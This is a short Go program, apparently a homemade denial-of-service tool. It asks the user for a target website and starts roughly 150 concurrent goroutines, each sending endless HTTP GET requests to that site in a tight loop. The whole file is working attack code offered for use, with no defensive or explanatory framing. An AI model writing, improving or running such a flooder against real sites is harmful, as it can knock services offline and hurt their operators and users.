package main

import (
	"fmt"
	"io/ioutil"
	"log"
	"net/http"
)


func main() {
	var target string
	fmt.Println("Enter targeting site foramt-> [http://123.com OR https://123.com]")
	fmt.Scanf("%s", &target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	go Ddos(target)
	fmt.Println("######################OK###################")
	Ddos(target)
}

func Ddos(site string) {
	for i := 0; true; i++ {
		resp, err := http.Get(site)
		if err != nil {
			log.Fatalln(err)
		}
		//We Read the response body on the line below.
		_, err = ioutil.ReadAll(resp.Body)
		if err != nil {
			log.Fatalln(err)
		}
		//Convert the body to type string
		fmt.Println("Rquest send>", i, ">> ", site)
	}
}
